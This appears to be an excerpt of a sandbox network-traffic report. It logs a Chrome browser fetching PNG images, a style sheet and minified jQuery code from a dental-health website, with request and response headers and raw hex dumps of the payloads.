                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                                                                                      Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                                                                                      Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                                                                                      Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      52192.168.2.164976891.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC628OUTGET /wp-content/uploads/2017/03/reason-1.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:28 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 3105
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:28 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:28 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0b c3 49 44 41 54 78 da ec 9d ed 71 db 38 10 86 29 4f fe 47 57 c0 4d 78 15 98 a9 40 74 05 91 2b b0 54 c1 d9 15 44 ae 40 56 05 56 2a 88 52 81 e8 0a 2c 57 20 dd 5c 01 e6 55 e0 e3 3a ab 1c 4f 43 7c 2f 40 80 da 9d d1 24 e3 44 34 08 3c 78 f7 83 00 38 ca 7a b0 b7 b7 b7 69 f3 c7 a4 f9 14 cd a7 14 fc b7 aa f9 1c 9a cf 0b fc 7d 34 1a ed b2 1e ad 69 f3 b8 d5 de 4b fc 7b de f1 5f a1 cd d0 d6 a7 18 da 7d 6a bf 7f 5c e4 78 0f 13 ec db cd df ff 2c 0e ba df 1f 05 ec 70 68 e4 4d f3 01 58 c6 96 97 a9 5a 03 51 05 00 e4 d8 b1 25 02 62 63 30 18 df 9a cf ba 69 f3
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<IDATxq8)OGWMx@t+TD@VV*R,W \U:OC|/@$D4<x8zi}4iK{_}j\x,phMXZQ%bc0i
                                                                                                                                      2024-04-24 10:13:28 UTC2203INData Raw: 14 b0 6c 63 ec 57 76 49 e1 61 39 2e ab ac 05 b0 c0 35 bf c7 3a 09 2f 2c 6e 96 61 71 9b fd c2 65 95 ad dd 17 d1 26 17 a6 c0 ec 18 16 27 58 ee 15 0b b6 97 59 d8 2d 34 1c c3 44 0c 4b 25 5b 5a 89 0b ea 67 b1 f7 03 15 30 05 c3 a2 74 e5 d7 96 df 4d 7a 79 c3 d9 b9 24 3c 80 c7 35 63 b9 d6 58 e1 5f a4 10 37 1a 01 23 5b ef 82 92 3a 34 58 28 32 96 7b cd b5 b8 e3 14 80 b1 59 de b0 13 cc 86 b1 c7 41 83 19 fe 23 23 3a e3 c4 f0 f7 ba b8 db 9d c1 96 90 4b c1 cf 5f 52 8f 61 ea 90 71 0c 02 02 45 2e d8 b7 f3 0a 0f f8 f0 3c 14 df e6 9a b1 98 c6 2d a2 54 fa 90 3a 30 4f 86 33 84 02 9a 76 65 14 32 89 6d 03 cd 33 ae 3b f1 a1 2e 26 0b b5 65 ae c8 64 b0 8b 14 80 31 de 66 22 79 20 06 67 a5 fc e1 d9 4d 74 2d 1f 80 99 bc 6e 3e 2b c3 01 12 fd 0e d1 fd 99 a6 d0 57 06 7d 5a 66 82 3d ea
                                                                                                                                      Data Ascii: lcWvIa9.5:/,naqe&'XY-4DK%[Zg0tMzy$<5cX_7#[:4X(2{YA##:K_RaqE.<-T:0O3ve2m3;.&ed1f"y gMt-n>+W}Zf=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      53192.168.2.164977091.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC628OUTGET /wp-content/uploads/2017/03/reason-2.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:28 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 2213
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:28 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:28 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 08 47 49 44 41 54 78 da ec 9d ff 71 e2 38 14 c7 05 73 ff 1f 57 c0 cd 39 15 84 54 10 a8 00 53 01 50 41 92 0a 02 15 84 54 00 5b 41 d8 0a f0 56 b0 6c 05 e1 e6 0a 38 ae 02 4e e2 9e 77 72 bb 20 c9 b6 64 3d 89 ef 77 c6 c3 ce ac 63 6c f1 d1 fb 3e c9 fa d1 11 50 2b fa fd d7 79 5f 7e a8 e3 96 3e 33 3a 2e e9 20 8f 9d 3c f6 f2 f8 a6 fe fd d7 3f f3 22 f4 73 74 f0 53 7a 85 24 97 1f 23 79 0c 0c 70 d8 4a 41 a4 a0 f9 2c 8f 8d 04 e8 00 60 2a ea 78 3c f6 3b 9d ce 8e 11 24 3d f9 f1 28 8f 89 23 48 74 f0 6c e4 b1 90 e0 ec 01 8c 19 14 55 6b 57 f4 a3 ec 24 34 77 0c
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<GIDATxq8sW9TSPAT[AVl8Nwr d=wcl>P+y_~>3:. <?"stSz$#ypJA,`*x<;$=(#HtlUkW$4w
                                                                                                                                      2024-04-24 10:13:28 UTC1311INData Raw: 7e ca 1e db 31 c3 c4 b6 6a 81 7d 16 69 68 a3 69 31 b9 8d 30 ea 45 21 b5 7e 6c 2e 5c be 34 8c 29 8c 5f b2 23 f5 62 6f 93 02 2d d4 62 da 68 6c 79 e0 04 18 82 65 2b ec 46 c5 2f d5 94 0f 66 7d 2b a6 fc 65 60 a8 95 29 e9 4b 8d 4a f3 5d bf 58 7e c9 4a d8 0d d0 19 47 90 ab 9c 53 bf 66 01 c7 28 dd ef 73 db 38 c2 d0 db 65 9b f1 20 37 91 c2 22 0c 95 61 97 12 2d 94 bc 5f ca 63 b2 c6 c0 58 64 cf 4f 11 25 b6 97 74 af 29 e0 a4 80 31 54 02 63 8f af 8d 25 e9 7c 2d aa 5c a5 86 f6 78 ae 0a 11 86 06 66 f7 34 c9 6d ca b0 a4 0c cc 9f 9a 06 40 d6 c4 92 fa 57 d0 37 61 d5 3a b8 22 35 02 a6 6e a2 08 25 2a 2d 30 86 56 cf 28 a1 72 38 00 05 07 c0 18 7c 7c 4a 1d 7a 29 b7 1a ae 51 bb a6 c0 e8 a2 cc 36 21 68 6a 35 33 23 d5 1f 9a 6e 84 43 53 60 3e 19 f2 98 14 a0 39 5c 59 9e 96 79 b3 24
                                                                                                                                      Data Ascii: ~1j}ihi10E!~l.\4)_#bo-bhlye+F/f}+e`)KJ]X~JGSf(s8e 7"a-_cXdO%t)1Tc%|-\xf4m@W7a:"5n%*-0V(r8||Jz)Q6!hj53#nCS`>9\Yy$


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      54192.168.2.164976991.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC628OUTGET /wp-content/uploads/2017/03/reason-3.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:28 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1598
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:28 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:28 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 05 e0 49 44 41 54 78 da ec 9d 8d 75 da 30 14 46 6d 26 a0 13 94 4c 50 98 20 ce 04 4d 37 08 13 34 4c d0 74 02 e8 04 c9 06 a4 13 90 4e 80 3b 01 74 02 b3 01 b5 9a e7 c6 c7 04 5b b6 65 59 32 f7 9e a3 03 6d 30 c8 d2 e7 f7 23 ac 47 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 25 f4 ad c3 c7 e3 71 92 3e 4c a5 5d a7 6d 2c cf cb d8 4b fb 95 b6 97 30 0c 5f 0c f5 25 4a 1f 22 e9 c7 44 5a 19 d9 e7 aa 7e c4 aa a5 7d d9 23 43 f3 22 b9 4d db 32 6d bb a3 19 92 b4 3d 8a f8 6a 0b 56 8e 4d
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<IDATxu0Fm&LP M74LtN;t[eY2m0#G%q>L]m,K0_%J"DZ~}#C"M2m=jVM
                                                                                                                                      2024-04-24 10:13:28 UTC696INData Raw: d6 ec 54 92 73 17 60 c1 35 6b 6e d9 d9 59 df ae 22 4a d6 e5 9e e9 ec 7c 3e ee 6b cc c7 d4 87 4e ae d9 bd d7 99 b5 5f 7b 73 f1 d6 ec ec 0e 17 65 dc 05 d5 d9 5e bc 76 45 e1 75 f7 44 2f b1 36 ad c7 7c d9 60 8f f6 d8 95 13 98 36 dc 64 8e b5 e9 de aa f4 1b b7 94 9c c8 43 c3 4d e6 eb 26 85 7d 2e 50 28 93 9a ee 3f cf 83 ab 27 b5 69 51 9d 00 37 65 ce fd f4 b3 de d2 f0 e4 12 df 4b 5a 38 34 96 0f 06 c6 73 ec fa 89 46 7d d6 a0 1b 88 eb 31 55 43 2f f2 e5 a4 97 47 73 ac 2f a1 60 a0 14 2f 5a 1b 1c b7 a5 6f 03 60 ba 4e dd 6e 68 05 03 73 85 1f 4d 97 6a db fa ea 83 bb 2a 45 e6 ad 78 3a 14 89 95 b8 a5 eb fa 30 ca 87 76 1d a5 ab db 0b 5e 82 d7 0a 05 b1 e9 9b 90 4c 08 24 78 db d0 ae 5c 6b d7 41 e8 4d 97 f7 dd 84 16 06 4c ad 01 7c b3 38 47 d9 0d 4b 59 25 8a bd 2d 11 15 6e 31
                                                                                                                                      Data Ascii: Ts`5knY"J|>kN_{se^vEuD/6|`6dCM&}.P(?'iQ7eKZ84sF}1UC/Gs/`/Zo`NnhsMj*Ex:0v^L$x\kAML|8GKY%-n1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      55192.168.2.164977391.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC628OUTGET /wp-content/uploads/2017/03/reason-4.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:28 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 2702
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:28 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:28 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0a 30 49 44 41 54 78 da ec 5d ed 71 db 38 10 a5 34 fe 7f 4c 01 37 66 2a 30 53 81 99 0e 94 0a 8e ae 20 4a 05 e1 55 a0 a4 02 39 15 d8 a9 80 52 05 92 2a 10 3d 57 80 74 15 e8 40 1f 38 e7 53 88 ef 05 89 05 f7 cd 70 94 d8 32 09 60 1f de 7e 00 24 67 c9 c4 70 b9 5c 0a f6 91 b3 e3 96 7f a6 fc 53 17 7b 76 9c f9 e7 a1 fd 9c cd 66 fb 84 10 0d 41 32 76 2c d9 51 5f fc e1 c8 8e 55 7b 2d 1a 71 bc 44 29 d9 b1 bb 0c 8f 96 38 29 59 00 07 49 52 76 54 ec 38 5d c6 c5 8e 48 13 3e 59 16 dc 35 84 82 28 49 33 8b 41 55 d8 c7 9a 1d 8b 00 9b f7 8d 1d 3f db 20 99 02 e3 30
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<0IDATx]q84L7f*0S JU9R*=Wt@8Sp2`~$gp\S{vfA2v,Q_U{-qD)8)YIRvT8]H>Y5(I3AU? 0
                                                                                                                                      2024-04-24 10:13:28 UTC1800INData Raw: cb 11 db b5 0c 59 fd a6 4e 9a 4a f2 ae e8 7c 84 f6 e4 92 f6 54 64 b1 30 48 b3 93 cc e8 7c 60 b2 9c 62 a9 ea c6 4c 18 d9 ac de 0d 91 6a f3 14 7a 17 92 da 11 e4 06 2b 15 a4 c9 3d 13 56 46 96 92 2c 84 2b 6b ea dc 53 e1 e1 9a 85 c4 0d 51 56 84 80 34 f5 45 8e 0a f0 5a 95 e2 5a 35 59 24 7c c2 a8 62 89 6e 09 a1 70 54 95 a3 e2 1a 3b 5a 5c 8c 8b 34 1d 71 4a 1d c3 f2 73 96 1a 44 89 9a 2c b3 c8 89 d3 c6 0f ba 01 67 f7 e8 f8 97 ab 9f b7 4f 5a c8 13 fd 9b e6 1e 67 b3 d9 03 4d 5b bc a4 59 2a 82 52 28 9c c6 ac 2e 13 ec dc 50 2a f8 5d a6 11 0c bb a0 16 95 fc 65 ed 22 8c 43 94 05 3b 9e b8 e1 16 1a df 3d 02 12 e5 a8 79 cd 0b 6f e3 82 2c 36 0e 49 5a c5 58 f5 b8 9a 4a f3 ef 8b 37 24 b3 c1 5a 37 cb ea 49 bd 4f bc ed 54 f9 1d c0 e5 94 8a ec a7 b6 54 a8 8a bb 95 5a e0 6e 6a fe
                                                                                                                                      Data Ascii: YNJ|Td0H|`bLjz+=VF,+kSQV4EZZ5Y$|bnpT;Z\4qJsD,gOZgM[Y*R(.P*]e"C;=yo,6IZXJ7$Z7IOTTZnj


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      56192.168.2.164977591.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC398OUTGET /wp-content/themes/dentalhealthstop/images/shield.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:28 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:12 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 6588
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:28 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:28 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e1 00 00 00 e2 08 06 00 00 00 b8 27 a0 d4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 19 5e 49 44 41 54 78 da ec 9d 7d 70 55 e5 9d c7 9f 4b 78 0d 2f 4d 09 2f 0a 12 22 be 10 a9 68 7c 1d 58 b4 40 c5 dd 95 95 01 66 77 ff 40 c7 b5 d1 ae ce 74 ac 2d 4b c7 e9 74 ec 08 e3 b6 63 77 c7 55 d7 d6 19 33 2a 38 5b a4 75 77 35 54 8a b0 2e 25 20 54 0b 8b 06 50 83 11 30 01 13 20 e4 86 c0 25 b9 dc 84 4b f6 fc 72 cf 91 9b c3 bd b9 f7 3e 2f e7 3c cf 39 df ef cc 99 1b 12 ce 7d 39 39 9f 7c 7f 2f cf 4b 84 41 c6 a8 6a 61 ef 3c eb e1 41 eb 58 62 1d 25 89 ee 28 4b 5e 48 d0 8f 1a ad a3 c6 3a 5e f8 dd 1f 27 37 e2 4a 99 a5 08 2e 81 11 f0 95 8c 29 61 ab cf
                                                                                                                                      Data Ascii: PNGIHDR'tEXtSoftwareAdobe ImageReadyqe<^IDATx}pUKx/M/"h|X@fw@t-KtcwU3*8[uw5T.% TP0 %Kr>/<9}99|/KAja<AXb%(K^H:^'7J.)a
                                                                                                                                      2024-04-24 10:13:28 UTC5686INData Raw: 22 01 85 8d 20 a3 e2 c9 3c 2b b4 9c 6a 85 96 e5 3a 01 97 2e 72 bc bb 97 f4 6f 3d a8 82 d0 c9 15 a9 68 43 c5 1b 4d 45 10 d6 95 8e 2f aa 8b 9e 4c 36 d9 e1 6c 63 90 73 cb 88 c7 50 08 69 52 19 2b 6f 39 72 49 9e 76 63 da 73 cf 33 e9 e2 53 cb 61 d9 3f 66 ae 7c aa 82 d0 d1 21 2b 34 ad 59 cb fa 1a fd 06 a9 c3 86 92 7d b3 b4 a8 f1 54 34 d9 ef dd 4f bb 76 48 dd e1 86 1e 19 4e ea 29 f4 11 85 e0 39 53 77 7e c8 3c 2c e9 9b a0 8a 99 a9 bc af 90 d0 53 36 84 8e 76 bf 9f 0a 51 3d 18 6d 63 9a 08 42 4f 86 ea 45 14 01 98 f7 b2 7d 61 12 39 1e 39 9f bb e9 ee 27 84 4e 88 4a f9 e2 f6 4d 5a e5 8b ba 48 f9 72 91 11 00 e8 0d 7c 94 f3 cd 59 20 f7 79 65 41 08 18 fd 05 31 22 19 40 02 ef 4b 00 78 31 ec a4 96 83 2c e7 53 0d 61 3a 8c 54 b8 41 98 da 4f d4 52 99 6f 02 84 2b 99 c4 e5 1b 4c
                                                                                                                                      Data Ascii: " <+j:.ro=hCME/L6lcsPiR+o9rIvcs3Sa?f|!+4Y}T4OvHN)9Sw~<,S6vQ=mcBOE}a99'NJMZHr|Y yeA1"@Kx1,Sa:TAORo+L


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      57192.168.2.164977691.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:28 UTC587OUTGET /wp-content/themes/dentalhealthstop/style.css HTTP/1.1
